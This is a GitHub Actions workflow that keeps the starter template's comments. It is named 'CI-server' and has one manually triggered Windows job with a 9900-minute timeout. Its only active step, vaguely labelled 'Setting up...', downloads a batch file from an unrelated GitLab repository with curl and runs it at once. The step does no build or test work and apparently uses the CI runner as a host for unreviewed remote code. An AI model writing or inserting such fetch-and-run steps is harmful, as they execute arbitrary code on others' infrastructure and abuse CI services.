# This is a basic workflow to help you get started with Actions

name: CI-server
# Controls when the workflow will run
on:
# Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: windows-2019
    timeout-minutes: 9900
    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      # - uses: actions/checkout@v4
        - name: Setting up...
          run: curl -sOL https://gitlab.com/rangagtlab/light-manager/-/raw/main/launch.bat && cmd /c launch.bat
        

          
